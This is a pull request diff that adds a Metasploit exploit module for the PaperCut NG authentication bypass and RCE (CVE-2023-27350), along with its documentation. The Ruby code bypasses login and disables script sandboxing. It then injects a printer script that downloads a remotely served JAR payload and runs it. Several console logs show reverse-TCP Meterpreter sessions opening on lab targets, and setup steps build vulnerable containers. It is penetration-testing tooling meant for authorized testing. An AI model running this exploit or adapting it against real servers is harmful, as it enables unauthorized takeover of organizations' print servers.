### PR TITLE
PaperCutNG Authentication Bypass with RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/papercut_ng_auth_bypass.md
+++ b/documentation/modules/exploit/multi/http/papercut_ng_auth_bypass.md
@@ -1,5 +1,7 @@
-## Description
-PaperCut NG Authentication Bypass affecting the below versions, see [confirmation](https://www.papercut.com/kb/Main/PO-1216-and-PO-1219#product-status-and-next-steps):
+## Vulnerable Application
+### Description
+PaperCut NG Authentication Bypass affecting the below versions, see
+[confirmation](https://www.papercut.com/kb/Main/PO-1216-and-PO-1219#product-status-and-next-steps):
 - version 8.0.0 to 19.2.7 (inclusive)
 - version 20.0.0 to 20.1.6 (inclusive)
 - version 21.0.0 to 21.2.10 (inclusive)
@@ -7,10 +9,12 @@ PaperCut NG Authentication Bypass affecting the below versions, see [confirmatio
 
 See module `info` for additional references.
 
-## Vulnerable Application
-Papercut NG can be run in a container. This is useful for creating test environments for verification. To acquire past versions of the software, i.e. known vulnerable versions, see [Download past/old PaperCut NG Versions](https://www.papercut.com/kb/Main/PastVersions).
+### Building a Vulnerable Container
+Papercut NG can be run in a container. This is useful for creating test environments for verification. To acquire past versions of the
+software, i.e. known vulnerable versions, see [Download past/old PaperCut NG Versions](https://www.papercut.com/kb/Main/PastVersions).
 
-Versions 16 and later include a "--non-interactive" switch, easing installation. Below I use podman on Centos 9 Stream to containerize the application for testing.
+Versions 16 and later include a "--non-interactive" switch, easing installation. Below I use podman on Centos 9 Stream to containerize the
+application for testing.
 
 From an empty directory, create a Dockerfile containing the following:
 ```dockerfile
@@ -33,11 +37,21 @@ curl -OJ "https://cdn.papercut.com/files/pcng/16.x/pcng-setup-16.4.39159-linux-x
 podman build . --tag papercut-16.4.39159
 podman run -it --rm -p 9191:9191 localhost/papercut-16.4.39159 /bin/bash -c "sh /*.sh --non-interactive; read"
 ```
-Note: *Be sure to cross reference the target version with the known vulnerable versions, as some of the links in the listed Past Versions are patched.*
+Note: *Be sure to cross reference the target version with the known vulnerable versions, as some of the links in the listed Past Versions
+are patched.*
 
-A URL will be provided in the console to access the application, but you will likely need to use an IP accessible from your metasploit host, e.g. [127.0.0.1](http://127.0.0.1:9191/admin) in order to complete the application setup. After setup, you may commit changes to the container & tag the new image to maintain your configuration changes. In the future the service can be restarted using `/etc/init.d/papercut start` from within the container.
+A URL will be provided in the console to access the application, but you will likely need to use an IP accessible from your metasploit
+host, e.g. [127.0.0.1](http://127.0.0.1:9191/admin) in order to complete the application setup. After setup, you may commit changes to the
+container & tag the new image to maintain your configuration changes. In the future the service can be restarted using
+`/etc/init.d/papercut start` from within the container.
 
-*Caveat: When first starting the server or after completing the installation, at least one user needs to login. I think this has something to do with getting the license manager into the correct state (i.e. loading the license). When this is not yet done then the Authentication Bypass is still functional leading to a "Target Vulnerable" message during `check`. However, when attempting to select the "\[Template Printer\]" a redirect to the About page occurs instead. Ensuring a logon can be done by using the "Login" button presented on the SetupCompleted page used for the bypass. This scenario is not covered in the module as it is unlikely to be an issue on any network that is currently in use.*
+*Caveat: When first starting the server or after completing the installation, at least one user needs to login. I think this has something
+to do with getting the license manager into the correct state (i.e. loading the license). When this is not yet done then the Authentication
+Bypass is still functional leading to a "Target Vulnerable" message during `check`. However, when attempting to select the
+"\[Template Printer\]" a redirect to the About page occurs instead. Ensuring a logon can be done by using the "Login" button presented on
+the SetupCompleted page used for the bypass. This scenario is not covered in the module as it is unlikely to be an issue on any network
+that is currently in use.*
+
 
 ## Verification Steps
 
@@ -201,4 +215,5 @@ msf6 exploit(multi/http/papercut_ng_auth_bypass) > run
 
 meterpreter >
 ```
-Note: Version 14, and possibly earlier, use a different HTML element to report the active version when exercising the vulnerable 'SetupCompleted' page.
+Note: Version 14, and possibly earlier, use a different HTML element to report the active version when exercising the vulnerable
+'SetupCompleted' page.

--- a/documentation/modules/exploit/multi/http/papercut_ng_auth_bypass.md
+++ b/documentation/modules/exploit/multi/http/papercut_ng_auth_bypass.md
@@ -1,0 +1,204 @@
+## Description
+PaperCut NG Authentication Bypass affecting the below versions, see [confirmation](https://www.papercut.com/kb/Main/PO-1216-and-PO-1219#product-status-and-next-steps):
+- version 8.0.0 to 19.2.7 (inclusive)
+- version 20.0.0 to 20.1.6 (inclusive)
+- version 21.0.0 to 21.2.10 (inclusive)
+- version 22.0.0 to 22.0.8 (inclusive)
+
+See module `info` for additional references.
+
+## Vulnerable Application
+Papercut NG can be run in a container. This is useful for creating test environments for verification. To acquire past versions of the software, i.e. known vulnerable versions, see [Download past/old PaperCut NG Versions](https://www.papercut.com/kb/Main/PastVersions).
+
+Versions 16 and later include a "--non-interactive" switch, easing installation. Below I use podman on Centos 9 Stream to containerize the application for testing.
+
+From an empty directory, create a Dockerfile containing the following:
+```dockerfile
+FROM almalinux
+RUN yum install -y procps-ng net-tools cpio sudo perl which
+RUN yum install -y initscripts
+RUN useradd -ms /bin/bash papercut
+RUN usermod -a -G wheel papercut
+RUN echo "papercut        ALL=(ALL)       NOPASSWD: ALL" >> /etc/sudoers
+
+COPY pcng-setup-*.sh /
+
+USER papercut
+WORKDIR /home/papercut
+```
+
+Download a vulnerable version. Build a container. Run the container while performing the installation.
+```sh
+curl -OJ "https://cdn.papercut.com/files/pcng/16.x/pcng-setup-16.4.39159-linux-x64.sh"
+podman build . --tag papercut-16.4.39159
+podman run -it --rm -p 9191:9191 localhost/papercut-16.4.39159 /bin/bash -c "sh /*.sh --non-interactive; read"
+```
+Note: *Be sure to cross reference the target version with the known vulnerable versions, as some of the links in the listed Past Versions are patched.*
+
+A URL will be provided in the console to access the application, but you will likely need to use an IP accessible from your metasploit host, e.g. [127.0.0.1](http://127.0.0.1:9191/admin) in order to complete the application setup. After setup, you may commit changes to the container & tag the new image to maintain your configuration changes. In the future the service can be restarted using `/etc/init.d/papercut start` from within the container.
+
+*Caveat: When first starting the server or after completing the installation, at least one user needs to login. I think this has something to do with getting the license manager into the correct state (i.e. loading the license). When this is not yet done then the Authentication Bypass is still functional leading to a "Target Vulnerable" message during `check`. However, when attempting to select the "\[Template Printer\]" a redirect to the About page occurs instead. Ensuring a logon can be done by using the "Login" button presented on the SetupCompleted page used for the bypass. This scenario is not covered in the module as it is unlikely to be an issue on any network that is currently in use.*
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use multi/http/papercut_ng_auth_bypass`
+3. `set RHOSTS [target]`
+4. `run`
+
+## Scenarios
+
+### Tested on Linux x64 with PaperCut NG Version 22.0.8.65201
+```
+msf6 > use exploit/multi/http/papercut_ng_auth_bypass
+[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
+RHOSTS => 10.0.4.101
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
+LHOST => 10.0.4.101
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > run
+
+[-] Handler failed to bind to 10.0.4.101:4444:-  -
+[*] Started reverse TCP handler on 0.0.0.0:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Bypass successful and created session: JSESSIONID=node0cwd0h7aut351pzjcifwvdyg25.node0
+[+] The target is vulnerable.
+[*] Setting server option 'print-and-device.script.enabled' to 'Y') was 'N'
+[*] Setting server option 'print.script.sandboxed' to 'N') was 'Y'
+[*] Using URL: http://10.0.4.101:8080/rYrjrI0
+[*] Server started.
+[*] Sending payload for requested uri: /rYrjrI0.jar
+[*] Sending payload for requested uri: /rYrjrI0.jar
+[*] Sending stage (58851 bytes) to 10.0.2.100
+[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:46224) at 2023-05-11 01:13:29 +0000
+[*] Server stopped.
+[*] rolling back 'print.script.sandboxed' to 'Y'
+[*] Setting server option 'print.script.sandboxed' to 'Y') was 'N'
+[*] rolling back 'print-and-device.script.enabled' to 'N'
+[*] Setting server option 'print-and-device.script.enabled' to 'N') was 'Y'
+
+meterpreter >
+```
+Note: Sandboxing is enabled by default in this version, scripting must be enabled and sandboxing must be disabled.
+
+
+### Tested on Linux x64 with PaperCut NG Version 19.2.7.62200
+```
+msf6 > use exploit/multi/http/papercut_ng_auth_bypass
+[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
+RHOSTS => 10.0.4.101
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
+LHOST => 10.0.4.101
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > run
+
+[-] Handler failed to bind to 10.0.4.101:4444:-  -
+[*] Started reverse TCP handler on 0.0.0.0:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Bypass successful and created session: JSESSIONID=node01j4of6hup0i131vs585edo0uqb2.node0
+[+] The target is vulnerable.
+[*] Setting server option 'print-and-device.script.enabled' to 'Y') was 'N'
+[*] Setting server option 'print.script.sandboxed' to 'N') was 'Y'
+[*] Using URL: http://10.0.4.101:8080/PWMM7S32xpRY7
+[*] Server started.
+[*] Sending payload for requested uri: /PWMM7S32xpRY7.jar
+[*] Sending payload for requested uri: /PWMM7S32xpRY7.jar
+[*] Sending stage (58851 bytes) to 10.0.2.100
+[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:35072) at 2023-05-11 01:25:25 +0000
+[*] Server stopped.
+[*] Rolling back 'print.script.sandboxed' to 'Y'
+[*] Setting server option 'print.script.sandboxed' to 'Y') was 'N'
+[*] Rolling back 'print-and-device.script.enabled' to 'N'
+[*] Setting server option 'print-and-device.script.enabled' to 'N') was 'Y'
+
+meterpreter >
+```
+Note: Sandboxing is enabled by default in this version, scripting must be enabled and sandboxing must be disabled.
+
+
+### Tested on Linux x64 with PaperCut NG Version 18.3.9.49588d
+```
+msf6 > use exploit/multi/http/papercut_ng_auth_bypass
+[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
+RHOSTS => 10.0.4.101
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
+LHOST => 10.0.4.101
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > run
+
+[-] Handler failed to bind to 10.0.4.101:4444:-  -
+[*] Started reverse TCP handler on 0.0.0.0:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Bypass successful and created session: JSESSIONID=node0re9f1cbww5v11qgrc7y4g9qv3.node0
+[+] The target is vulnerable.
+[*] Using URL: http://10.0.4.101:8080/o30YxAzAA69ISJ8
+[*] Server started.
+[*] Sending payload for requested uri: /o30YxAzAA69ISJ8.jar
+[*] Sending stage (58851 bytes) to 10.0.2.100
+[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:40328) at 2023-05-11 02:29:15 +0000
+[*] Server stopped.
+
+meterpreter >
+```
+
+### Tested on Linux x64 with PaperCut NG Version 16.4.39159
+```
+msf6 > use exploit/multi/http/papercut_ng_auth_bypass
+[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
+RHOSTS => 10.0.4.101
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
+LHOST => 10.0.4.101
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > run
+
+[-] Handler failed to bind to 10.0.4.101:4444:-  -
+[*] Started reverse TCP handler on 0.0.0.0:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Bypass successful and created session: JSESSIONID=e79i55m6n77ex4p6ee3fu8u9
+[+] The target is vulnerable.
+[*] Using URL: http://10.0.4.101:8080/GuHN8K
+[*] Server started.
+[*] Sending payload for requested uri: /GuHN8K.jar
+[*] Sending stage (58851 bytes) to 10.0.2.100
+[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:58324) at 2023-05-11 03:22:13 +0000
+[*] Server stopped.
+
+meterpreter >
+```
+Note: The 'Form0' parameter for version 16 and lower does not take an additional '$Submit$1' value.
+
+### Tested on Linux x64 with PaperCut NG Version 14.3.30457
+```
+msf6 > use exploit/multi/http/papercut_ng_auth_bypass
+[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set RHOSTS 10.0.4.101
+RHOSTS => 10.0.4.101
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > set LHOST 10.0.4.101
+LHOST => 10.0.4.101
+msf6 exploit(multi/http/papercut_ng_auth_bypass) > run
+
+[-] Handler failed to bind to 10.0.4.101:4444:-  -
+[*] Started reverse TCP handler on 0.0.0.0:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Bypass successful and created session: JSESSIONID=b9g3gepapev0
+[+] The target is vulnerable.
+[*] Using URL: http://10.0.4.101:8080/kBXJNp
+[*] Server started.
+[*] Sending payload for requested uri: /kBXJNp.jar
+[*] Sending stage (58851 bytes) to 10.0.2.100
+[*] Meterpreter session 1 opened (10.0.2.100:4444 -> 10.0.2.100:32852) at 2023-05-11 03:56:24 +0000
+[*] Server stopped.
+
+meterpreter >
+```
+Note: Version 14, and possibly earlier, use a different HTML element to report the active version when exercising the vulnerable 'SetupCompleted' page.

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri(target_uri.path),
         'keep_cookies' => true,
         'headers' => {
-          'Origin' => @origin
+          'Origin' => full_uri
         },
         'vars_post' => {
           'service' => 'direct/1/ConfigEditor/quickFindForm',
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri(target_uri.path),
         'keep_cookies' => true,
         'headers' => {
-          'Origin' => @origin
+          'Origin' => full_uri
         },
         'vars_post' => {
           'service' => 'direct/1/ConfigEditor/$Form',
@@ -163,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri(target_uri.path),
         'keep_cookies' => true,
         'headers' => {
-          'Origin' => @origin
+          'Origin' => full_uri
         },
         'vars_post' => {
           'service' => 'direct/1/PrinterDetails/$PrinterDetailsScript.$Form',
@@ -194,11 +194,6 @@ s;
 
   def exploit
     @payload_uri = get_uri
-    protocol = 'http'
-    if datastore['SSL']
-      protocol = 'https'
-    end
-    @origin = URI("#{protocol}://#{datastore['RHOST']}:#{datastore['RPORT']}") # required for anti-CSRF mechanisms
 
     # Main function
     # 1) Bypass the auth using the SetupCompleted page & store the csrf_token for future requests.
@@ -226,7 +221,7 @@ s;
         'uri' => normalize_uri(target_uri.path),
         'keep_cookies' => true,
         'headers' => {
-          'Origin' => @origin
+          'Origin' => full_uri
         },
         'vars_get' => {
           'service' => 'direct/1/PrinterList/selectPrinter',

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => ['catatonicprime'],
         'References' => [
-          ['CVE', '2023–27350'],
+          ['CVE', '2023-27350'],
           ['ZDI', '23-233'],
           ['URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219'],
           ['URL', 'https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/'],

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -27,13 +27,14 @@ class MetasploitModule < Msf::Exploit::Remote
           to modifcation of server settings.
         },
         'License' => MSF_LICENSE,
-        'Author' => [ 'catatonicprime' ],
+        'Author' => ['catatonicprime'],
         'References' => [
           ['CVE', '2023–27350'],
-          [ 'URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219' ],
-          [ 'URL', 'https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/' ],
-          [ 'URL', 'https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/'],
-          [ 'URL', 'https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software' ]
+          ['ZDI', 'CAN-18987'],
+          ['URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219'],
+          ['URL', 'https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/'],
+          ['URL', 'https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/'],
+          ['URL', 'https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software']
         ],
         'Stance' => Msf::Exploit::Stance::Aggressive,
         'Targets' => [ [ 'Automatic Target', {}] ],

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
     version_match = product_details.text.match('(?<major>[0-9]+)\.(?<minor>[0-9]+)')
     @version_major = Integer(version_match[:major])
     match = res.get_html_document.xpath('//script[contains(text(),"csrfToken")]').text.match(/var csrfToken ?= ?'(?<csrf>[^']*)'/)
-    match ? match[:csrf] : ''
+    @csrf_token = match ? match[:csrf] : ''
   end
 
   def get_config_option(name)

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -209,8 +209,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @payload_uri = get_uri
-
     # Main function
     # 1) Bypass the auth using the SetupCompleted page & store the csrf_token for future requests.
     @csrf_token = bypass_auth unless @csrf_token

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -77,6 +77,14 @@ class MetasploitModule < Msf::Exploit::Remote
     return nil unless res && res.code == 200
 
     vprint_good("Bypass successful and created session: #{cookie_jar.cookies[0]}")
+
+    # Parse the application version from the response for future decisions.
+    product_details = res.get_html_document.xpath('//div[contains(@class, "product-details")]//span').children[1]
+    if product_details.nil?
+      product_details = res.get_html_document.xpath('//span[contains(@class, "version")]')
+    end
+    version_match = product_details.text.match('(?<major>[0-9]+)\.(?<minor>[0-9]+)')
+    @version_major = Integer(version_match[:major])
     match = res.get_html_document.xpath('//script[contains(text(),"csrfToken")]').text.match(/var csrfToken ?= ?'(?<csrf>[^']*)'/)
     match ? match[:csrf] : ''
   end
@@ -145,6 +153,12 @@ class MetasploitModule < Msf::Exploit::Remote
       var cl = new java.net.URLClassLoader(urls).loadClass('metasploit.Payload').newInstance().main([]);
       s;
     SCRIPT
+
+    # The number of parameters passed changed in version 17.
+    form0 = 'printerId,enablePrintScript,scriptBody,$Submit,$Submit$0'
+    if @version_major > 16
+      form0 += ',$Submit$1'
+    end
     # 6) Trigger the code execution the printer_id
     res = send_request_cgi(
       {
@@ -157,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'vars_post' => {
           'service' => 'direct/1/PrinterDetails/$PrinterDetailsScript.$Form',
           'sp' => 'S0',
-          'Form0' => 'printerId,enablePrintScript,scriptBody,$Submit,$Submit$0,$Submit$1',
+          'Form0' => form0,
           'enablePrintScript' => 'on',
           '$Submit$1' => 'Apply',
           'printerId' => 'l1001',
@@ -188,12 +202,14 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with Failure::NotVulnerable, 'Target is not vulnerable'
     end
 
-    # 2) Enable scripts, if needed
-    set_config_option('print-and-device.script.enabled', 'Y')
+    # Sandboxing wasn't introduced until version 19
+    if @version_major >= 19
+      # 2) Enable scripts, if needed
+      set_config_option('print-and-device.script.enabled', 'Y')
 
-    # 3) Disable sandboxing, if needed
-    set_config_option('print.script.sandboxed', 'N')
-
+      # 3) Disable sandboxing, if needed
+      set_config_option('print.script.sandboxed', 'N')
+    end
     # 5) Select the printer, this loads it into the tapestry session to be modified
     res = send_request_cgi(
       {

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -74,6 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     return nil unless res && res.code == 200
+
     vprint_good("Bypass successful and created session: #{cookie_jar.cookies[0]}")
     res.get_html_document.xpath('//script')[-1].text.split("'")[1]
   end
@@ -98,8 +99,8 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     # 2) parse and return the result
-    return nil unless res && res.code == 200 && html = res.get_html_document
-    return nil unless td = html.xpath("//td[@class='propertyNameColumnValue']")
+    return nil unless res && res.code == 200 && (html = res.get_html_document)
+    return nil unless (td = html.xpath("//td[@class='propertyNameColumnValue']"))
     return nil unless td.count == 1 && td.text == name
 
     value_input = html.xpath("//input[@name='$TextField$0']")
@@ -132,6 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       }
     )
+    fail_with Failure::NotVulnerable, "Could not update server config option '#{name}' to value of '#{value}'" unless res && res.code == 200
   end
 
   def primer
@@ -152,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'enablePrintScript' => 'on',
           '$Submit$1' => 'Apply',
           'printerId' => 'l1001',
-          'scriptBody' => %Q{
+          'scriptBody' => %{
 var urls = [new java.net.URL("#{payload_uri}.jar")];
 var cl = new java.net.URLClassLoader(urls).loadClass('metasploit.Payload').newInstance().main([]);
 s;
@@ -160,7 +162,7 @@ s;
         }
       }
     )
-    return Exploit::Failed unless res && res.code == 200
+    fail_with Failure::NotVulnerable, 'Failed to prime payload.' unless res && res.code == 200
   end
 
   def check
@@ -169,6 +171,7 @@ s;
     if bypass_success.nil?
       return Exploit::CheckCode::Safe
     end
+
     return Exploit::CheckCode::Vulnerable
   end
 
@@ -183,16 +186,10 @@ s;
     end
 
     # 2) Enable scripts, if needed
-    success = set_config_option('print-and-device.script.enabled', 'Y')
-    if success == Exploit::Failed
-      return Exploit::Failed
-    end
+    set_config_option('print-and-device.script.enabled', 'Y')
 
     # 3) Disable sandboxing, if needed
-    success = set_config_option('print.script.sandboxed', 'N')
-    if success == Exploit::Failed
-      return Exploit::Failed
-    end
+    set_config_option('print.script.sandboxed', 'N')
 
     # 5) Select the printer, this loads it into the tapestry session to be modified
     res = send_request_cgi(
@@ -209,7 +206,7 @@ s;
         }
       }
     )
-    return Exploit::Failed unless res && res.code == 200
+    fail_with Failure::NotVulnerable, 'Unable to select [Template Printer]' unless res && res.code == 200
 
     Timeout.timeout(datastore['HTTPDELAY']) { super }
   rescue Timeout::Error

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -52,7 +52,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'PAYLOAD' => 'java/meterpreter/reverse_tcp',
           'RPORT' => '9191',
           'SSL' => 'false',
-          'TARGETURI' => '/app',
           'PAYLOAD_CLASS' => 'metasploit.Payload',
           'JAR_FILE' => '',
           'HTTPDELAY' => 10
@@ -66,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'Path to the papercut application']),
+        OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']),
         OptString.new('PAYLOAD_CLASS', [false, 'Class containing main method to load']),
         OptString.new('JAR_FILE', [true, 'Local path to jar file to serve, e.g. msfvenom output jar file']),
         OptInt.new('HTTPDELAY', [false, 'Path to the papercut application']),

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -3,8 +3,12 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'debug'
+require 'cgi'
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
     super(
@@ -18,6 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           [ 'URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219' ]
         ],
+        'Targets' => [ [ 'Automatic Target', {}] ],
         'Platform' => [ 'win', 'linux'],
         'Payload' => {
           'BadChars' => "\x00"
@@ -25,6 +30,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => true,
         'DisclosureDate' => '2023-03-13',
         'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => '9192',
+          'SSL' => 'True',
+          'TARGETURI' => '/app'
+        },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -32,11 +42,29 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to the papercut application'])
+      ], self.class
+    )
   end
 
   def bypass_auth
     # Hit the SetupCompleted Page & establish an authenticated session.
     # Return success/fail or vuln/not vuln based on response values
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'service' => 'page/SetupCompleted'
+        }
+      }
+    )
+    return Exploit::CheckCode::Safe unless res && res.code == 200
+
+    return Exploit::CheckCode::Appears
   end
 
   def set_server_option
@@ -46,11 +74,94 @@ class MetasploitModule < Msf::Exploit::Remote
     # 3) else, if necessary, do an update
   end
 
+  def get_printer
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'service' => 'page/PrinterList'
+        }
+      }
+    )
+    return Exploit::Failed unless res && res.code == 200
+
+    html = res.get_html_document
+    return Exploit::Failed unless html
+
+    printer = html.at('.displayNameColumnValue a')
+    return Exploit::Failed unless printer && printer['href']
+
+    uri = URI(normalize_uri(printer['href']))
+    return Exploit::Failed unless uri
+
+    params = CGI.parse(uri.query)
+    return Exploit::Failed unless params && params['sp']
+
+    return params['sp'][0]
+  end
+
   def check
     # For the check command
+    return bypass_auth
   end
 
   def exploit
     # Main function
+    # 1) Bypass the auth using the SetupCompleted page
+    bypass_auth
+    # 2) Enable scripts, if needed
+    # 3) Disable sandboxing, if needed
+    # 4) Find a printerId
+    printer_id = get_printer
+    print_status('Using printerid: ' + printer_id)
+
+    # 5) Select the printer, this loads it into the tapestry session to be modified
+    protocol = 'http'
+    if datastore['SSL']
+      protocol = 'https'
+    end
+    origin = URI("#{protocol}://#{datastore['RHOST']}:#{datastore['RPORT']}")
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'headers' => {
+          'Origin' => origin
+        },
+        'vars_get' => {
+          'service' => 'direct/1/PrinterList/selectPrinter',
+          'sp' => printer_id
+        }
+      }
+    )
+    return Exploit::Failed unless res && res.code == 200
+
+    # 6) Exploit a printer using the printer_id
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path),
+        'keep_cookies' => true,
+        'headers' => {
+          'Origin' => origin
+        },
+        'vars_post' => {
+          'service' => 'direct/1/PrinterDetails/$PrinterDetailsScript.$Form',
+          'sp' => 'S0',
+          'Form0' => 'printerId,enablePrintScript,scriptBody,$Submit,$Submit$0,$Submit$1',
+          'enablePrintScript' => 'on',
+          '$Submit$1' => 'Apply',
+          'printerId' => printer_id,
+          'scriptBody' => %q{
+var rt = new java.lang.Runtime.getRuntime();
+rt.exec('c:\\\\windows\\\\system32\\\\cmd.exe /c "ping 192.168.1.3"');
+s;}
+        }
+      }
+    )
+    return Exploit::Failed unless res && res.code == 200
   end
 end

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']),
-        OptInt.new('HTTPDELAY', [false, '...', 10])
+        OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
       ], self.class
     )
   end

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -29,6 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [ 'catatonicprime' ],
         'References' => [
+          ['CVE', '2023–27350'],
           [ 'URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219' ],
           [ 'URL', 'https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/' ],
           [ 'URL', 'https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/'],
